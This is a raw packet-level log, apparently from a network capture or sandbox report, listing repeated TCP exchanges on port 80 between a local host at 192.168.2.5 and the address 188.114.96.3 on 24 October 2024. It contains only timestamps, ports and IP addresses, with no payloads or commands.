                                      Oct 24, 2024 17:02:21.685997009 CEST4974580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:21.691523075 CEST8049745188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:21.691586971 CEST4974580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:21.697232962 CEST8049745188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:22.993580103 CEST8049745188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:22.993659019 CEST4974580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:22.997114897 CEST8049745188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:22.997159004 CEST4974580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:22.999017954 CEST8049745188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:23.196938038 CEST4975780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:23.202326059 CEST8049757188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:23.202393055 CEST4975780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:23.205740929 CEST4975780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:23.211105108 CEST8049757188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:23.211146116 CEST4975780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:23.217427969 CEST8049757188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:24.412775993 CEST8049757188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:24.412934065 CEST4975780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:24.415539026 CEST8049757188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:24.415607929 CEST4975780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:24.418373108 CEST8049757188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:24.547487974 CEST4976380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:24.552992105 CEST8049763188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:24.553193092 CEST4976380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:24.555114031 CEST4976380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:24.561616898 CEST8049763188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:24.561675072 CEST4976380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:24.567044973 CEST8049763188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:25.588660002 CEST8049763188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:25.588805914 CEST4976380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:25.590356112 CEST8049763188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:25.590507984 CEST4976380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:25.594775915 CEST8049763188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:25.731827974 CEST4977480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:25.737267017 CEST8049774188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:25.738250971 CEST4977480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:25.740081072 CEST4977480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:25.747837067 CEST8049774188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:25.747925043 CEST4977480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:25.754416943 CEST8049774188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:26.637290955 CEST8049774188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:26.637708902 CEST4977480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:26.639601946 CEST8049774188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:26.639667988 CEST4977480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:26.643572092 CEST8049774188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:26.781264067 CEST4978080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:26.787131071 CEST8049780188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:26.787218094 CEST4978080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:26.789365053 CEST4978080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:26.794806004 CEST8049780188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:26.794869900 CEST4978080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:26.800514936 CEST8049780188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:27.668710947 CEST8049780188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:27.669186115 CEST4978080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:27.669954062 CEST8049780188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:27.670021057 CEST4978080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:27.675985098 CEST8049780188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:27.811871052 CEST4978680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:27.817529917 CEST8049786188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:27.817625046 CEST4978680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:27.819351912 CEST4978680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:27.825397968 CEST8049786188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:27.825460911 CEST4978680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:27.830914974 CEST8049786188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:28.717905045 CEST8049786188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:28.718138933 CEST4978680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:28.720370054 CEST8049786188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:28.720463037 CEST4978680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:28.723927975 CEST8049786188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:28.864563942 CEST4979280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:28.871383905 CEST8049792188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:28.871473074 CEST4979280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:28.873809099 CEST4979280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:28.879156113 CEST8049792188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:28.879211903 CEST4979280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:28.884627104 CEST8049792188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:29.781430006 CEST8049792188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:29.781590939 CEST4979280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:29.784497976 CEST8049792188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:29.784578085 CEST4979280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:29.787110090 CEST8049792188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:29.922964096 CEST4979880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:29.928764105 CEST8049798188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:29.928883076 CEST4979880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:29.931011915 CEST4979880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:29.936548948 CEST8049798188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:29.936630011 CEST4979880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:29.945296049 CEST8049798188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:30.857218981 CEST8049798188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:30.857302904 CEST4979880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:30.857404947 CEST8049798188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:30.857456923 CEST4979880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:30.862976074 CEST8049798188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:30.999973059 CEST4980680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:31.007788897 CEST8049806188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:31.007957935 CEST4980680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:31.009783030 CEST4980680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:31.015239954 CEST8049806188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:31.015360117 CEST4980680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:31.020982981 CEST8049806188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:33.136374950 CEST8049806188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:33.136590958 CEST4980680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:33.138602972 CEST8049806188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:33.138737917 CEST4980680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:33.141972065 CEST8049806188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:33.285435915 CEST4982080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:33.291435003 CEST8049820188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:33.291529894 CEST4982080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:33.293499947 CEST4982080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:33.298835039 CEST8049820188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:33.298933029 CEST4982080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:33.304404974 CEST8049820188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:34.213545084 CEST8049820188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:34.213680983 CEST4982080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:34.215704918 CEST8049820188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:34.215749025 CEST4982080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:34.219047070 CEST8049820188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:34.359239101 CEST4982680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:34.364712954 CEST8049826188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:34.364811897 CEST4982680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:34.366801977 CEST4982680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:34.372196913 CEST8049826188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:34.372256041 CEST4982680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:34.377913952 CEST8049826188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:35.272162914 CEST8049826188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:35.272272110 CEST4982680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:35.278001070 CEST8049826188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:35.278065920 CEST4982680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:35.405451059 CEST4983280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:35.411814928 CEST8049832188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:35.411968946 CEST4983280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:35.413671970 CEST4983280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:35.421330929 CEST8049832188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:35.421422958 CEST4983280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:35.428555012 CEST8049832188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:37.391191006 CEST8049832188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:37.391379118 CEST4983280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:37.393877029 CEST8049832188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:37.393932104 CEST4983280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:37.397824049 CEST8049832188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:37.531950951 CEST4984580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:37.537543058 CEST8049845188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:37.537652016 CEST4984580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:37.539633989 CEST4984580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:37.545499086 CEST8049845188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:37.545567989 CEST4984580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:37.556279898 CEST8049845188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:38.478197098 CEST8049845188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:38.478307009 CEST4984580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:38.484052896 CEST8049845188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:38.484122038 CEST4984580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:38.624834061 CEST4985380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:38.630693913 CEST8049853188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:38.630796909 CEST4985380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:38.632541895 CEST4985380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:38.637954950 CEST8049853188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:38.638010979 CEST4985380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:38.643774986 CEST8049853188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:39.504625082 CEST8049853188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:39.504865885 CEST4985380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:39.508295059 CEST8049853188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:39.508359909 CEST4985380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:39.510265112 CEST8049853188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:39.645205975 CEST4985980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:39.650665998 CEST8049859188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:39.650743961 CEST4985980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:39.652800083 CEST4985980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:39.658262014 CEST8049859188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:39.658318043 CEST4985980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:39.663871050 CEST8049859188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:40.706804991 CEST8049859188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:40.706963062 CEST4985980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:40.708583117 CEST8049859188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:40.708642006 CEST4985980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:40.712629080 CEST8049859188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:40.968975067 CEST4986680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:40.975866079 CEST8049866188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:40.975933075 CEST4986680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:40.993042946 CEST4986680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:40.998776913 CEST8049866188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:40.998847008 CEST4986680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:41.004833937 CEST8049866188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:42.062196970 CEST8049866188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:42.062393904 CEST4986680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:42.064163923 CEST8049866188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:42.064222097 CEST4986680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:42.068198919 CEST8049866188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:42.205254078 CEST4987580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:42.210788965 CEST8049875188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:42.210880995 CEST4987580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:42.212672949 CEST4987580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:42.218091965 CEST8049875188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:42.218169928 CEST4987580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:42.223558903 CEST8049875188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:43.137540102 CEST8049875188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:43.137633085 CEST4987580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:43.139627934 CEST8049875188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:43.139677048 CEST4987580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:43.143301964 CEST8049875188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:43.303441048 CEST4988180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:43.309089899 CEST8049881188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:43.309164047 CEST4988180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:43.311990023 CEST4988180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:43.317687988 CEST8049881188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:43.317732096 CEST4988180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:43.323287964 CEST8049881188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:45.389446974 CEST8049881188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:45.392151117 CEST8049881188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:45.392280102 CEST4988180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:45.392580032 CEST4988180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:45.397964001 CEST8049881188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:45.528819084 CEST4989380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:45.534291983 CEST8049893188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:45.536959887 CEST4989380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:45.538822889 CEST4989380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:45.544162989 CEST8049893188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:45.544944048 CEST4989380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:45.550570011 CEST8049893188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:46.415992022 CEST8049893188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:46.416414022 CEST4989380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:46.418135881 CEST8049893188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:46.418195963 CEST4989380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:46.421854973 CEST8049893188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:46.567109108 CEST4989980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:46.572932959 CEST8049899188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:46.573029041 CEST4989980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:46.574980021 CEST4989980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:46.580364943 CEST8049899188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:46.580421925 CEST4989980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:46.585942030 CEST8049899188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:47.642119884 CEST8049899188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:47.642216921 CEST4989980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:47.648236036 CEST8049899188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:47.648297071 CEST4989980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:47.648909092 CEST8049899188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:47.783318996 CEST4990780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:47.789305925 CEST8049907188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:47.789397001 CEST4990780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:47.791491985 CEST4990780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:47.796885014 CEST8049907188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:47.796961069 CEST4990780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:47.802529097 CEST8049907188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:50.896435022 CEST8049907188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:50.896698952 CEST4990780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:50.898237944 CEST8049907188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:50.898303032 CEST4990780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:50.902069092 CEST8049907188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:51.032052040 CEST4992580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:51.037571907 CEST8049925188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:51.037641048 CEST4992580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:51.040842056 CEST4992580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:51.046194077 CEST8049925188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:51.046250105 CEST4992580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:51.051543951 CEST8049925188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:53.493185997 CEST8049925188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:53.493288040 CEST4992580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:53.496578932 CEST8049925188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:53.496649027 CEST4992580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:53.499003887 CEST8049925188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:53.643075943 CEST4994180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:53.648783922 CEST8049941188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:53.648879051 CEST4994180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:53.650609016 CEST4994180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:53.656002998 CEST8049941188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:53.656101942 CEST4994180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:53.661494017 CEST8049941188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:58.098172903 CEST8049941188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:58.098284006 CEST4994180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:58.100761890 CEST8049941188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:58.100821018 CEST4994180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:58.103765011 CEST8049941188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:58.232548952 CEST4996380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:58.238305092 CEST8049963188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:58.238429070 CEST4996380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:58.240186930 CEST4996380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:58.245512009 CEST8049963188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:58.245580912 CEST4996380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:58.251121044 CEST8049963188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:59.277235985 CEST8049963188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:59.277600050 CEST4996380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:59.278565884 CEST8049963188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:59.278615952 CEST4996380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:59.282995939 CEST8049963188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:59.430176020 CEST4996880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:59.435800076 CEST8049968188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:59.435897112 CEST4996880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:59.437935114 CEST4996880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:59.443329096 CEST8049968188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:02:59.443401098 CEST4996880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:02:59.448807001 CEST8049968188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:00.367789030 CEST8049968188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:00.368597031 CEST8049968188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:00.368673086 CEST4996880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:00.369251013 CEST4996880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:00.374881029 CEST8049968188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:00.532908916 CEST4997280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:00.538466930 CEST8049972188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:00.538548946 CEST4997280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:00.540592909 CEST4997280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:00.546082973 CEST8049972188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:00.546133995 CEST4997280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:00.551652908 CEST8049972188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:01.522497892 CEST8049972188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:01.522799969 CEST4997280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:01.523382902 CEST8049972188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:01.524090052 CEST4997280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:01.528667927 CEST8049972188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:01.658711910 CEST4997680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:01.664305925 CEST8049976188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:01.664424896 CEST4997680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:01.666158915 CEST4997680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:01.671938896 CEST8049976188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:01.672985077 CEST4997680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:01.678661108 CEST8049976188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:03.971559048 CEST8049976188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:03.971788883 CEST4997680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:03.973407984 CEST8049976188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:03.973479986 CEST4997680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:03.977387905 CEST8049976188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:04.107510090 CEST4998080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:04.115098953 CEST8049980188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:04.115226984 CEST4998080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:04.117002010 CEST4998080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:04.123996019 CEST8049980188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:04.124053955 CEST4998080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:04.129527092 CEST8049980188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:05.022277117 CEST8049980188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:05.022506952 CEST4998080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:05.024343967 CEST8049980188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:05.024410963 CEST4998080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:05.027945995 CEST8049980188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:05.156328917 CEST4998380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:05.161931992 CEST8049983188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:05.162087917 CEST4998380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:05.163805962 CEST4998380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:05.169297934 CEST8049983188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:05.169369936 CEST4998380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:05.174873114 CEST8049983188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:06.083108902 CEST8049983188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:06.083278894 CEST4998380192.168.2.5188.114.96.3
